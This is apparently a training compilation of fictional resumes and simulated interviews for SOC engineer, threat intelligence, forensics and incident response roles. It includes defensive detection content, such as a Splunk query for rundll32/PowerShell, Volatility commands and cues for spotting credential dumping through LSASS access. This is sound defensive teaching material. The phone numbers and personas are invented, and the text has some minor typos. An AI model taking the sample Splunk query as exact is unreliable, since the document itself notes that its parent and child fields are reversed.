• Excellent collaboration with engineering, IR and red team
• Reliable escalation handler for complex use cases
• Effective communicator in reporting detection logic to clients
SIMULATED INTERVIEW APPLYING FOR THE ROLE OF CYBERSECURITY
SOC ENGINEER

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Dimitar Berbatov, welcome. Can you start by telling us a bit about yourself
and why you're applying for the SOC Engineer role here at Cybermir Defence?

Candidate (Dimitar): Thank you. I’m Dimitar Berbatov, currently working as a

Cybersecurity Analyst L2 at IzzmierCyber Defense. Over the past 3 years, I’ve grown from
basic alert triage to deeper incident investigations and recently started supporting our
SIEM team with rule tuning, log onboarding and detection content development.
I'm applying for the SOC Engineer role at Cybermir Defence because I'm passionate about
building scalable, high-fidelity detection systems. I want to contribute to the engineering
backbone of a SOC, ensuring log visibility, detection quality and automation are in place to
empower the analysts.

SECTION 2: CYBERSECURITY & SOC FUNDAMENTALS

Interviewer: What do you think is the core difference between a SOC Analyst and a SOC
Engineer?

Candidate: A SOC Analyst consumes alerts and investigates threats, while a SOC
Engineer builds and maintains the systems that generate those alerts. Analysts focus on
incident detection and response, while engineers ensure the SIEM, log pipelines, detection
rules and enrichment logic are functioning properly and efficiently.

Interviewer: Can you explain the importance of log source normalization in a SIEM?

Candidate: Normalization ensures data from various log sources is structured in a

consistent way so that detection rules, dashboards and correlations can be applied across
systems. Without normalization, fields like src_ip, dest_ip or user could be named
differently or absent altogether, which would break detection logic or create visibility gaps.

Interviewer: What’s the MITRE ATT&CK framework’s role in building detection content?

Candidate: MITRE ATT&CK helps structure and prioritise detection logic based on real-
world attacker TTPs. As a SOC Engineer, I use it to align detection rules to relevant
techniques (e.g., T1059.001 for PowerShell abuse), ensuring we detect behavioural
indicators, not just IOCs. It also supports detection coverage reporting and gap analysis.

SECTION 3: SIEM & DETECTION ENGINEERING TECHNICAL ROUND

Interviewer: You’ve used Splunk before. How do you test and deploy a new detection rule?
Candidate:

1. Draft the rule based on MITRE technique or observed behaviour

2. Test it in a dev environment using known Interviewerign and simulated malicious
data
3. Backtest across 30 days of logs to check signal-to-noise ratio
4. Tune thresholds/exclusions if needed
5. Document: rule logic, purpose, false positive expectations
6. Deploy to prod in disabled or "audit-only" mode
7. Review results, then enable for active alerting after validation

Interviewer: Can you write a basic SPL detection for detecting rundll32.exe spawning
PowerShell.exe?

Candidate: Yes, a simple SPL for Splunk would look like:

index=windows sourcetype=Sysmon
Image="*\\rundll32.exe" ParentImage="*\\powershell.exe"
| stats count by ComputerName, Image, ParentImage, CommandLine, _time

Alternatively, I'd reverse the parent-child based on the environment and add filters to
reduce noise from legitimate admin tasks.

Interviewer: What’s your approach to building correlation logic for multi-stage attacks?

Candidate: I first map the attack stages to MITRE (e.g., Initial Access → Execution → C2).
Then, I build logic that links separate alerts or events within a time window:

• Correlate failed login + successful login + abnormal process

• Use transaction or stats commands in Splunk to stitch related events
• I also use risk-based scoring for context enrichment

SECTION 4: SCENARIO-BASED PROBLEM SOLVING

Interviewer: Let’s simulate a case. A client complains about missed detections during a
red team test. Where do you begin?

Candidate:

1. Log Coverage Audit – Verify required log sources (e.g., EDR, Sysmon, firewall) were
ingested during the red team window
2. Detection Review – Cross-check existing rules against red team TTPs (e.g.,
T1021.001 – RDP)
3. Test Replay – Replay test artefacts or logs in dev to identify failure points
 4. Gap Fix – Build or tune rules, improve field extraction if parsing failed
5. Report – Document findings, detection gaps and mitigation steps
6. Simulate & Validate – Re-run detection test to verify fix before client debrief

Interviewer: You're onboarding logs from a new Palo Alto firewall. What’s your approach?

Candidate:

1. Validate Connectivity: Ensure logs are reaching the SIEM (via Syslog/CEF)
2. Parsing Check: Confirm field mapping (e.g., src_ip, action, threat_id) using
sourcetype=paloalto
3. Field Normalisation: Ensure alignment with CIM or internal standards
4. Use Case Mapping: Determine which existing rules apply (e.g., port scans, malware
blocking)
5. Test Alerts: Trigger a sample alert using test traffic
6. Documentation: Update log onboarding matrix and SIEM inventory

Interviewer: If a detection rule is firing excessively after deployment, how would you tune
it?

Candidate:

• Review triggering data: Is it a specific system, user or process causing it?

• Whitelist known legitimate behaviour (e.g., scheduled scan by AV)
• Adjust thresholds (e.g., increase login failure count from 3 to 10)
• Add logic: Combine with rare user, geolocation mismatch or process anomalies
• Backtest again before pushing the tuned rule

SECTION 5: LOG ONBOARDING & PARSING

Interviewer: Can you explain the difference between raw logs, parsed logs and normalised
logs?

Candidate:

• Raw Logs: Original, unstructured logs as sent from the source

• Parsed Logs: Structured into key-value pairs (e.g., extracted fields via regex)
• Normalised Logs: Parsed logs mapped to a common schema (e.g., CIM in Splunk),
enabling consistent query and detection logic across sources

Interviewer: Have you dealt with broken field extractions? What’s your approach?
Candidate: Yes. I use rex, spath or field extractor tools to fix broken parsing. I test regex on
sample data, apply it to the dev environment and validate with multiple log samples. I also
ensure naming follows SIEM field standards (src_ip, dest_port, etc.).

SECTION 6: COLLABORATION & DOCUMENTATION

Interviewer: How do you work with analysts to improve detection logic?

Candidate: I hold regular review sessions with L1/L2s to gather feedback on noisy rules. I
look at:

• False positive trends

• Analyst triage comments
• Alert suppression patterns
This helps prioritise tuning or redesign. Collaboration also ensures the detection
makes sense to those working on the front line.

Interviewer:How do you ensure proper documentation for long-term SOC

maintInterviewerbility?

Candidate: Every detection rule I build includes:

• Rule name, ID, MITRE mapping

• Description, logic explanation
• False positive expectations
• Related playbook/runbook
I store these in Confluence or Git for version control and knowledge transfer.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thank you, Dimitar. Do you have any questions for us?

Candidate: Yes, thank you:

1. Does Cybermir Defence use a detection-as-code approach (e.g., versioning rules in

Git)?
2. What’s the roadmap for your SIEM platform, are you migrating or hybridising with
cloud-native solutions?
3. Will the SOC Engineer role be involved in red/blue validation and purple team
exercises?
CYBERSECURITY ANALYST L2 RESUME

PATRICE EVRA
Cybersecurity Analyst | Threat Intelligence-Focused | MITRE ATT&CK Mapping | IOC & TTP
Enrichment
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/patriceevra | GitHub: github.com/patricecyber

PROFESSIONAL SUMMARY

Experienced L2 Cybersecurity Analyst with 4+ years in SOC operations, now transitioning

into Threat Intelligence. Skilled in alert investigations, IOC enrichment, malware analysis
and adversary tracking using frameworks like MITRE ATT&CK. Adept at working with threat
intel platforms (VirusTotal, MISP, Group-IB), performing TTP profiling and delivering client-
facing threat reports. Seeking an L3 Analyst (CTI) role to support threat actor tracking,
detection content enhancement and intelligence-driven defence.

CURRENT POSITION

Cybersecurity Analyst – Level 2 (CTI-Embedded Role)

IzzmierCyber Defense Sdn Bhd – Cyberjaya, Malaysia
Aug 2022 – Present

• Led escalation investigations involving APT-style activities, credential harvesting

and data exfiltration attempts
• Performed deep enrichment of IOCs using VirusTotal, AbuseIPDB and URLScan to
track infrastructure reuse
• Created threat actor profiles based on TTP correlations from internal and open-
source data
• Produced tactical and operational threat reports for internal SOC and clients,
mapped to MITRE ATT&CK
• Collaborated with threat intel team to improve detection rules based on emerging
malware behaviours
• Engaged in malware sandbox analysis (Any.Run, Joe Sandbox) and documented key
artefacts
• Maintained a living IOC repository and built custom YARA rules for recurring threats

Key Achievements:

• Identified and documented a phishing campaign linked to a known South-East Asia

threat cluster
• Co-authored monthly intelligence bulletins for MSSP clients with technical and
executive summaries
• Developed a heat map dashboard of top TTPs detected in customer environments
(mapped to ATT&CK)

EDUCATION

Bachelor of Information Technology (Networking)

Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst

• Threat Intelligence Analyst – EC-Council CTIA
• MITRE ATT&CK Cyber Threat Intelligence Training (MITRE Engenuity)
• TryHackMe – Threat Intelligence & Malware Analysis Path (Completed)

SKILLS & TOOLS

Threat Intelligence Platforms

• MISP, VirusTotal, Group-IB, IBM X-Force, AlienVault OTX

Malware & IOC Analysis

• Any.Run, Hybrid Analysis, Intezer, CyberChef, YARA, URLScan

Reporting & Frameworks

• MITRE ATT&CK, VERIS, STIX/TAXII, TLP Classification

SIEM & Log Analysis

• Splunk, Wazuh, Sentinel (IOC pivoting & detection support)

Others

• Sigma Rules (for TI-enhanced detections), KQL, Python (IOC parsing scripts),
GitHub IOC automation, ATT&CK Navigator

PROJECTS & INITIATIVES

Threat Actor Infrastructure Tracker (Internal Project)

• Developed internal tracker for recurring IPs/domains associated with phishing &
malware delivery
 • Integrated into SOC workflows for IOC correlation and enrichment

MITRE ATT&CK Coverage Heatmap

• Created dashboard in ATT&CK Navigator based on observed techniques across 20+

clients
• Helped prioritise detection engineering for high-frequency TTPs

YARA Rule Contribution for Macro-Based Malware

• Authored YARA signatures to detect malicious VBA macros

• Deployed in sandbox and tested against public samples

TYPICAL CTI WORK OUTPUT

• IOC Enrichment Reports: Containing pivoted data, source attribution and timeline
• Threat Briefs: Monthly PDF reports summarising regional threats and emerging
actor activity
• TTP Analysis: ATT&CK-mapped profiles based on internal detection trends
• Playbook Support: Provided intel for IR team to enhance phishing response SOPs

COLLABORATION & KNOWLEDGE SHARING

• Worked closely with red team to document known post-exploitation C2 behaviours

• Provided threat briefings to internal L1/L2 teams on new phishing kits and delivery
methods
• Shared detection gaps with detection engineering team and contributed Sigma
rules
SIMULATED INTERVIEW WHO IS APPLYING FOR A CYBERSECURITY
ANALYST L3 – CYBER THREAT INTELLIGENCE (CTI) ROLE

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Welcome, Patrice! Let’s start with a brief introduction. Can you tell us about
yourself and what motivated you to apply for this CTI L3 role at Cybermir Defence?

Candidate (Patrice):
Thank you. I’m Patrice Evra, currently a Cybersecurity Analyst L2 embedded in a CTI-
supporting role at IzzmierCyber Defense. Over the last 4 years, I’ve transitioned from
traditional SOC analysis into supporting intelligence-driven investigations, enriching IOCs,
tracking campaigns and building threat actor profiles aligned with MITRE ATT&CK.
I’m particularly drawn to Cybermir Defiance’s focus on regional threat research and actor
tracking. I want to contribute more strategically to CTI by producing higher-value
intelligence that informs not just detections, but also threat hunting, response and
executive risk decisions.

SECTION 2: THREAT INTELLIGENCE KNOWLEDGE

Interviewer: What’s the difference between tactical, operational and strategic threat
intelligence?

Candidate:

• Tactical Intelligence focuses on IOCs, hashes, IPs, domains, and is used directly for
detection and blocking.
• Operational Intelligence provides insight into ongoing attacks: TTPs, malware
families, C2 infrastructure, used by blue teams and IR.
• Strategic Intelligence gives high-level, long-term context, such as threat actor
motivations, geopolitical risks and industry-specific targeting. This is used by
executives to assess risk and plan.

Interviewer: Can you explain the threat intelligence lifecycle?

Candidate: Sure. It includes the following phases:

1. Direction – Define requirements (e.g., what actors target our sector?)

2. Collection – Gather data from internal logs, OSINT, commercial feeds, etc.
3. Processing – Structure the data: normalisation, deduplication, enrichment
4. Analysis – Identify patterns, actor behaviour and meaningful connections
5. Dissemination – Distribute intelligence to the right audience (SOC, IR, leadership)
6. Feedback – Receive input to refine future collection or reporting
SECTION 3: TECHNICAL SKILLS – TOOLS, FRAMEWORKS, PLATFORMS

Interviewer: What threat intelligence platforms or tools do you regularly use?

Candidate: I work with:

• VirusTotal – for IOC enrichment and pivoting

• Any.Run / Hybrid Analysis – for malware sandboxing
• MISP – for structured intelligence and IOC sharing
• Group-IB Threat Intelligence – for actor tracking and infrastructure reuse
• MITRE ATT&CK Navigator – for TTP mapping and heatmaps
I also use CyberChef for decoding, URLScan.io and sometimes Shodan for
infrastructure lookups.

Interviewer: How do you track a phishing campaign over time?

Candidate:

1. Capture multiple phishing samples over time

2. Extract indicators (URLs, attachments, C2 IPs, sender info)
3. Use pivoting techniques in VirusTotal or PassiveDNS to find overlaps (hostnames,
certs, WHOIS data)
4. Correlate TTPs – like document metadata, redirect patterns or macro behaviour
5. Track infrastructure reuse or overlaps with known APT kits
6. Document and build a campaign profile that includes timeline, delivery
mechanism, observed changes and targeting pattern

Interviewer: Have you ever written a YARA rule? If so, for what?

Candidate: Yes. I wrote YARA rules to detect VBA macro malware that dropped reverse
shell payloads. I focused on identifying suspicious keywords, obfuscation functions like
Chr, Shell and encoded strings, especially those common in Agent Tesla and FormBook
loaders. I tested them in sandbox environments like Any.Run before sharing internally.

SECTION 4: SCENARIO-BASED ASSESSMENT

Interviewer: Let’s say you receive an IOC from VirusTotal: a suspicious executable hash.
How would you go about validating and enriching it?

Candidate:

1. Submit the hash to VirusTotal and review the detection ratio and behavioural
analysis
2. Pivot on:
 o Domains contacted
o Mutexes created
o File names used
o PDB paths
3. Use sandbox platforms like Any.Run or Intezer to confirm malicious behaviour
4. Check for relationships with known malware families or campaigns
5. Tag relevant MITRE ATT&CK techniques (e.g., T1059 if PowerShell used)
6. Add contextual info: targeted sectors, first-seen dates, C2 activity
7. Push enriched IOC to MISP or TI dashboard with confidence levels

Interviewer: Here’s another scenario: You suspect that a client is targeted by a new spear-
phishing campaign. What’s your approach?

Candidate:

1. Collect the emails and headers

2. Analyse attachments and links (sandbox, decoding, URL tracing)
3. Identify common themes (branding, subject lines, lures)
4. Extract IOCs and perform infrastructure correlation
5. Check if it aligns with any known actor SOP (e.g., Lazarus, Mustang Panda)
6. Share a technical report with SOC and IR team with detection and hunting
recommendations
7. If attribution is high confidence, add the actor to the internal tracking database

Interviewer: We’re tracking a campaign that uses changing C2 infrastructure every 48

hours. How would you identify patterns or automate this tracking?

Candidate:

• Use VirusTotal graph to track newly linked files/domains

• Correlate TLS cert reuse, WHOIS creation pattern, ASN or hosting provider
• Write Python scripts to pull IOC sets daily and flag matches
• If patterns exist (e.g., same URL structure, dynamic DNS provider), we can write
regex for early detection
• Work with detection engineers to monitor for outbound beacons to new C2 domains
based on behavioural patterns instead of static IOCs

SECTION 5: INTELLIGENCE REPORTING & COLLABORATION

Interviewer: How do you make intelligence reports relevant for both technical teams and
executives?

Candidate: I create two layers:

 • Tactical Brief: IOC tables, kill chain mapping, observed techniques, detection
suggestions
• Executive Summary: Business risk, industry trends, potential impact, actor
motivation
I use visuals like heat maps, timelines and a simplified risk scoring model. Clarity
and relevance to business objectives are key.

Interviewer: How do you handle false attribution or conflicting intel across different TI
sources?

Candidate:

• Compare TTPs, infrastructure and malware characteristics

• Weigh source reputation and confidence level
• Avoid definitive attribution unless multiple strong signals align
• Use qualifiers like "possibly linked to" or "TTPs similar to"
• Highlight discrepancies transparently in reporting

SECTION 6: ATTRIBUTION, ACTOR TRACKING, INTEL LIFECYCLE

Interviewer: Which actor groups do you follow most closely and why?

Candidate: I follow APT36, Mustang Panda and Lazarus Group due to their frequent
targeting of Southeast Asia and use of phishing + living-off-the-land binaries. Their TTPs
change often, so tracking their infrastructure and malware delivery methods gives valuable
context for local clients.

Interviewer: How would you update detection content based on CTI findings?

Candidate:

• Translate actor TTPs to Sigma rules (e.g., T1218.005 for mshta abuse)
• Share payload characteristics with EDR/IR teams
• Update IOC watchlists and alert thresholds
• Recommend suppression for Interviewerign overlap cases
• Test detection efficacy post-update with simulated artefacts

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Patrice, that wraps up our questions. Do you have anything you’d like
to ask us?

Candidate: Yes, thank you:

1. Does the CTI team here work closely with red or blue teams for intelligence
validation?
2. Are there opportunities to contribute to open-source research or public CTI reports
under Cybermir Defence’s name?
3. What’s the maturity level of your internal threat actor database? Is there room for
contribution?
CYBERSECURITY ANALYST L2 RESUME

RYAN GIGGS
Cybersecurity Analyst | DFIR-Focused | Incident Response | Digital Forensics
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/ryangiggs | GitHub: github.com/ryancyber

PROFESSIONAL SUMMARY

Experienced Cybersecurity Analyst with over 4 years of hands-on experience in SOC

environments. Skilled in triage, containment, malware behaviour analysis and forensic
investigation support. Has responded to real-world security incidents including
ransomware outbreaks, credential theft and insider abuse. Proficient in live response, IOC
pivoting, log reconstruction and digital evidence preservation. Now seeking to transition
into a Cybersecurity Analyst L3 – DFIR role to lead incident investigations and contribute to
forensic readiness and threat remediation.

CURRENT ROLE

Cybersecurity Analyst (L2)

IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Sept 2021 – Present

• Investigated and escalated over 300 incidents involving phishing, malware

infections and lateral movement
• Performed live incident triage using EDR tools (Cortex XDR, CrowdStrike Falcon)
and forensics tools (Velociraptor, FTK Imager)
• Participated in full incident lifecycle: identification, containment, eradication,
recovery and RCA reporting
• Conducted malware detonation and behavioural analysis using Any.Run and Hybrid
Analysis
• Assisted in acquisition of memory dumps, disk images and volatile artefacts during
post-compromise analysis
• Developed checklists for ransomware response and credential theft playbooks

Key Achievements:

• Isolated and analysed a targeted malware variant via memory analysis and string
extraction
• Contained lateral movement of ransomware via quick pivoting through firewall, AD and
endpoint logs
• Reduced IR response time by 40% through automation of initial evidence gathering
scripts
EDUCATION

Bachelor of Information Technology (Networking)

Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• GIAC Certified Forensic Analyst (GCFA) – In Progress

• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• TryHackMe: DFIR & Malware Analysis Paths – Completed
• Certified Incident Handler (ECIH) – EC-Council

TECHNICAL SKILLS

Incident Response & DFIR Tools:

• Cortex XDR, CrowdStrike, Velociraptor, FTK Imager, Volatility, Autopsy, Redline,

Plaso, Cyber Triage

Malware & Threat Analysis:

• Any.Run, Hybrid Analysis, CyberChef, PEStudio, YARA, Process Hacker

Forensics & Logs:

• Windows Event Logs, Sysmon, Zeek, Bro, PowerShell history, USN journal, MFT
analysis

Cloud Incident Response:

• AWS CloudTrail, Azure Audit Logs, Microsoft Defender for Endpoint

Scripting & Automation:

• Python (IOC extractor, memory hash validator), Bash, Sigma rule writing

PROJECTS & INVESTIGATIONS

Insider Threat Forensic Investigation

• Investigated data exfiltration via USB and cloud uploads

• Used FTK Imager for disk analysis and identified browser artefacts and exfil paths
 • Correlated USB insertions, file copy logs and suspicious Dropbox activity

Ransomware Case Response – Q1 2024

• Involved in real-time incident triage after detection of encryption on shared drives

• Analysed process tree, ransomware note and lateral movement patterns
• Supported live host containment, memory capture and attack chain reconstruction

DFIR Toolkit Automation Project

• Wrote scripts for mass log export from infected hosts (Event Logs, Autoruns,
Prefetch)
• Created standardised initial evidence collection checklist for L1 handoff

DOCUMENTATION & REPORTING

• Wrote post-incident reports including MITRE ATT&CK mapping and IOCs

• Built standard RCA templates and forensic chain-of-custody forms
• Documented internal playbooks for malware analysis and credential dumping

SOFT SKILLS & TEAM CONTRIBUTION

• Calm under pressure during live attacks

• Proven track record in incident coordination and cross-team response
• Provided knowledge transfer sessions on memory analysis and timeline building
• Collaborative with SOC, legal and IT ops teams during DFIR investigations
INTERVIEW SIMULATION APPLYING FOR THE ROLE OF CYBERSECURITY
ANALYST L3 – DIGITAL FORENSICS & INCIDENT RESPONSE (DFIR)

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Ryan! Let’s start with a quick introduction. Can you tell us about your
background and what made you apply for the L3 DFIR position here at Cybermir Defence?

Candidate (Ryan): Thank you. I’m Ryan Giggs, currently a Level 2 Cybersecurity Analyst at
IzzmierCyber Defense, with over four years of SOC experience. In the past two years, I’ve
been deeply involved in incident handling, live response and forensic support during
malware and insider threat cases. I’ve conducted disk imaging, memory analysis and
helped document root cause analysis for real-world ransomware and credential theft
cases.
I'm excited about Cybermir Defence's reputation for deep forensic work and advanced
incident handling. I'm ready to lead DFIR investigations and contribute to post-incident
analysis, playbook development and forensic readiness initiatives at an L3 level.

SECTION 2: CORE DFIR KNOWLEDGE

Interviewer: Explain the difference between volatile and non-volatile data in forensics.
Which would you collect first and why?

Candidate: Volatile data includes temporary or real-time information in memory , like

running processes, open network connections, clipboard contents, etc. Non-volatile data
is persistent, such as files on disk, registry hives and system logs.
In a live incident, I would prioritise collecting volatile data first, especially from memory,
because it’s lost when the system powers off. Capturing a memory dump, network activity
and current processes is essential for incident reconstruction.

Interviewer: What are the main phases of an incident response process?

Candidate:

1. Preparation – Tools, teams, documentation and readiness

2. Identification – Detect and validate the incident
3. Containment – Limit the spread (short and long-term strategies)
4. Eradication – Remove root cause (malware, persistence)
5. Recovery – Restore affected systems securely
6. Lessons Learned – Document RCA, update detection and playbooks

SECTION 3: TECHNICAL TOOLS & METHODOLOGY

Interviewer: Which forensic tools have you used and for what purposes?
Candidate:

• Velociraptor – For live response and artefact collection

• FTK Imager – For disk imaging and file extraction
• Autopsy – Timeline and artefact analysis
• Volatility – Memory analysis for processes, DLLs, network connections
• Redline – Quick triage and memory snapshot collection
• CyberChef – Decoding and string manipulation
• YARA – Custom malware signature detection

Interviewer: How do you preserve evidence integrity during forensic investigations?

Candidate:

• Use write blockers for disk acquisition

• Hash all collected images (MD5/SHA256) before and after acquisition
• Store in a secured repository with access control
• Maintain chain-of-custody documentation
• Use trusted tools and verify collection scripts before execution

Interviewer: What Windows artefacts are important during post-compromise

investigation?

Candidate:

• $MFT / $LogFile – File activity tracking

• Shimcache / Amcache – Evidence of execution
• Prefetch – Last run timestamp of executables
• Windows Event Logs – Security (4624, 4625), Sysmon (1, 3, 10, etc.)
• Registry Hives – Persistence keys in Run, Services, Image File Execution Options
• Jump Lists & LNK Files – Recently accessed documents

SECTION 4: SCENARIO-BASED RESPONSE

Interviewer: Let’s say a user reports their files were renamed with .CRYPT3 and a ransom
note appears. Walk us through your steps.

Candidate:

1. Initial Response:
o Instruct user to disconnect from the network
o Capture a memory dump and volatile data
o Identify the ransomware variant (check ransom note, file headers,
command-line activity)
 2. Containment:
o Isolate other machines showing encryption signs
o Block associated IPs/C2 if known
3. Investigation:
o Review Sysmon for dropped files, suspicious child processes
o Check use of vssadmin, wevtutil or shadow copy deletion
o Trace lateral movement (e.g., via SMB, RDP logs)
4. Eradication & Recovery:
o Remove malware
o Rebuild from backups (verify clean)
5. Post-Incident:
o Document full attack chain
o Deliver IOCs to SOC for future detections
o Update ransomware playbook

Interviewer: During a phishing attack, credentials were stolen. What logs and artefacts
would you collect?

Candidate:

• Email headers & full message – Trace sender, SPF/DKIM/DMARC status

• Web proxy logs – If user clicked links
• Credential usage logs – AD logs (4624, 4768), VPN logs
• Browser history – Suspicious redirects
• Endpoint logs – Credential manager access, keylogger payload
• MFA logs – To confirm bypass attempts
• I’d also check whether reused credentials were used for lateral movement.

SECTION 5: MALWARE ANALYSIS & MEMORY FORENSICS

Interviewer: How do you investigate a memory dump of a suspected compromised

machine?

Candidate: Using Volatility:

• pslist, pstree – See running processes

• malfind – Detect injected code
• cmdline, procdump – Review commands and extract binaries
• netscan – List open network connections
• dlllist, ldrmodules – See loaded DLLs
After extracting suspicious binaries, I’d check with Any.Run, run strings and scan
with YARA rules to identify malware families.

Interviewer: How would you detect credential dumping in memory?

Candidate:

• Check for suspicious access to lsass.exe

• Look for known tools like mimikatz.exe or LOLBins like rundll32
• Use handles and cmdline to see if unusual processes access LSASS
• Scan memory using YARA rules for known mimikatz signatures
• Cross-check event logs and execution timestamps

SECTION 6: REPORTING, CHAIN OF CUSTODY & COLLABORATION

Interviewer: What should a post-incident report contain?

Candidate:

• Executive Summary: Timeline, impacted assets, summary of attack

• Technical Details: MITRE mapping, IOCs, logs, malware behaviour
• Root Cause Analysis: Entry point, privilege escalation, lateral movement
• Remediation Actions: What was done, what is pending
• Lessons Learned & Recommendations: Prevention tips, IR playbook updates
• Appendices: Evidence hashes, tool outputs, memory/disk artefacts

Interviewer: How do you ensure collaboration between DFIR, legal and other
stakeholders?

Candidate:

• Maintain clear, timestamped logs of findings

• Use TLP classifications when sharing sensitive intel
• Limit forensic access to authorised team members
• Provide concise updates in non-technical language to legal/HR
• Work closely with SOC and TI teams to align on detections and follow-up actions

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thank you, Ryan. That’s all from us. Do you have any questions for us?

Candidate: Yes, thank you:

1. Does Cybermir Defence run internal red/blue/purple team simulations to validate IR

readiness?
2. Will the L3 DFIR role have access to cloud forensic tooling and support for
certification like GCFA or GNFA?
3. What’s your current incident frequency and the typical engagement model ,
retainer, MDR clients or on-demand?
CYBERSECURITY ANALYST L2 RESUME

ROY KEANE
Cybersecurity Analyst | Incident Responder | Threat Containment & Root Cause Analysis
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/roykeane | GitHub: github.com/roycyber

PROFESSIONAL SUMMARY

Experienced and high-performing Cybersecurity Analyst with 4+ years of hands-on

experience in real-world incident response operations. Skilled in identifying, triaging,
containing and investigating security incidents across on-prem and cloud environments.
Strong knowledge of attack life cycle, incident coordination and MITRE ATT&CK mapping.
Now seeking to transition into a Cybersecurity Analyst L3 (Incident Responder) role to lead
investigations, improve IR playbooks and drive rapid containment across critical
infrastructure.

CURRENT ROLE

Cybersecurity Analyst – Level 2 (Incident Response Focus)

IzzmierCyber Defense Sdn Bhd – Cyberjaya, Malaysia
Sept 2021 – Present

• Lead triage and response to high-severity incidents including credential theft,

malware outbreaks, insider misuse and lateral movement
• Perform root cause analysis (RCA), forensic artefact review and full incident
timeline reconstruction
• Use Cortex XDR, SentinelOne and Splunk to investigate, correlate and document
attack paths
• Act as escalation point for L1 analysts, guiding their investigation and response
actions
• Coordinate with clients during containment and recovery planning
• Regularly update and optimise IR playbooks for phishing, malware, privilege
escalation and command-and-control scenarios

Key Accomplishments:

• Contained a live ransomware attempt by isolating 7 machines within 20 minutes of

initial detection
• Built a rapid-response checklist for credential theft that reduced containment time by
35%
• Drafted executive-level post-incident reports for multiple financial sector clients

EDUCATION
Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2021 | CGPA: 3.45

CERTIFICATIONS

• CompTIA CySA+ – Cybersecurity Analyst

• Microsoft SC-200 – Security Operations Analyst
• EC-Council ECIH – Certified Incident Handler
• SANS SEC504/GCIH – In Progress
• TryHackMe: Incident Response & Malware Analysis Paths – Completed

TECHNICAL SKILLS

Incident Response & EDR

• Cortex XDR, SentinelOne, CrowdStrike Falcon, Microsoft Defender

• Live response, host isolation, process analysis, persistence discovery

Log Analysis & SIEM

• Splunk, Wazuh, Microsoft Sentinel

• Correlation rules, IOC lookups, behavioral queries

Threat Hunting & IOC Enrichment

• MITRE ATT&CK, Sigma, CyberChef, VirusTotal, Any.Run

• Detection of lateral movement, privilege abuse, C2 channels

Malware & Memory Artefact Triage

• Process Hacker, YARA, PEStudio, Redline, Volatility (basic usage)

Cloud & Hybrid Environment Support

• AWS CloudTrail, Azure Activity Logs, O365 email investigation

PROJECTS & INCIDENTS HANDLED

Banking Sector – Phishing to Credential Abuse Case

• Detected MFA bypass attempt following successful phishing

• Identified attacker using valid credentials across VPN
• Coordinated user account lockdown, password resets and SOC-wide alerting
Ransomware Attempt – Endpoint Triage & Containment

• Cortex XDR alert on vssadmin delete shadows

• Quickly isolated affected hosts, blocked lateral paths
• Recovered full attack sequence and submitted to TI team for actor profiling

Insider Threat – Unauthorised File Transfer

• Detected unusual USB and cloud storage use

• Acquired logs and LNK files to trace exact files exfiltrated
• Worked with HR and legal for formal evidence documentation

DOCUMENTATION & REPORTING

• Developed SOPs for phishing, malware response and data exfiltration

• Wrote post-incident RCA reports with full MITRE ATT&CK mapping
• Updated playbooks and containment workflow charts quarterly

SOFT SKILLS & LEADERSHIP

• Calm under pressure, decisive during live incidents

• Strong communicator with clients, legal and internal teams
• Trusted L2 escalation handler for major clients
• Mentor to new L1 hires in detection logic and IR flow
SIMULATED INTERVIEW WHO IS APPLYING FOR THE POSITION OF
CYBERSECURITY ANALYST L3 – INCIDENT RESPONSE

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Roy, welcome to Cybermir Defence. Can you start by introducing yourself
and sharing why you're interested in this L3 Incident Response role?

Candidate (Roy): Thank you. I’m Roy Keane, currently a Level 2 Cybersecurity Analyst at
IzzmierCyber Defense. I’ve spent the last four years in active SOC environments, but over
the past two, my focus has shifted heavily into incident response. I’ve led containment
during ransomware attempts, coordinated with stakeholders during phishing-to-MFA-
bypass incidents and authored RCA reports with MITRE mapping.
I’m applying for this L3 role at Cybermir Defence because your response centre is known
for leading regional investigations and building out response automation. I’m ready to take
the lead in incident triage, evidence gathering and post-incident lessons learned while
contributing to IR maturity and knowledge sharing.

SECTION 2: CORE INCIDENT RESPONSE KNOWLEDGE

Interviewer: Can you walk us through the standard phases of an incident response?

Candidate: Certainly. The six phases are:

1. Preparation – Policies, tools, runbooks, team readiness

2. Identification – Detecting and confirming an incident
3. Containment – Stopping the threat short-term and long-term
4. Eradication – Removing the root cause (e.g., malware, persistence)
5. Recovery – Returning systems to production, monitoring post-recovery
6. Lessons Learned – RCA, documentation, updates to detection and SOPs

Interviewer: How do you define a “security incident” versus a “security event”?

Candidate: A security event is any observable occurrence in a system or network, like a

login or a file transfer. A security incident is when that event indicates a breach or
malicious activity, for example, multiple failed logins followed by a successful one from an
unusual IP may escalate from an event to an incident based on context.

Interviewer: What metrics do you consider when evaluating the effectiveness of an IR

team?

Candidate:

• MTTD (Mean Time to Detect)

 • MTTR (Mean Time to Respond)
• Containment Time
• False Positive Rate
• Incident Closure SLA
I also look at qualitative feedback, e.g., whether analysts are consistently applying
RCA and post-incident improvements.

SECTION 3: TECHNICAL IR SKILLS & TOOLS

Interviewer: What are your go-to tools for investigating endpoint-related incidents?

Candidate:

• Cortex XDR & SentinelOne – For EDR telemetry, process trees, host isolation
• Redline & Velociraptor – For live response and memory artefact collection
• Autoruns, Process Hacker, PEStudio – For persistence and suspicious binaries
• Volatility – For memory analysis
• CyberChef – For decoding payloads or encoded PowerShell
I usually start with EDR pivoting and memory capture if there's evidence of post-
exploitation activity.

